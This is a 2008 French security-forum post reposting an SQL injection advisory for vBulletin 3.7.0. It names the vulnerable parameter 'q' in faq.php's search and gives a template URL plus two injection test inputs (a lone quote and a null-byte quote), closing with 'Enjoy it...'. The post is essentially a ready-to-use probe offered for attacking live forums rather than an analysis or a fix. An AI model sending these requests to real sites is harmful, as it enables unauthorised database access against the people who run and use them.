Faille Vbulletin 3.7.0

Moderator: Mod

Faille Vbulletin 3.7.0

Postby DEXTER74 » Wed Oct 29, 2008 3:51 am

By : Ali Jasbi
Script : vbulletin.org
Version : 3.7.0 Gold eDITION
Vulnerability: Sql injection

http://www.domain.com/vBulletin/faq.php?s=&do=search&q=[Sql injection]&match=any&titlesonly=1
test it:

faq.php?s=&do=search&q='&match=any&titlesonly=1
faq.php?s=&do=search&q=%00'&match=all&titlesonly=0

Enjoy it...
DEXTER74
Projets
 
Posts: 5
Joined: Sun Oct 05, 2008 12:58 am

Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 1 guest

cron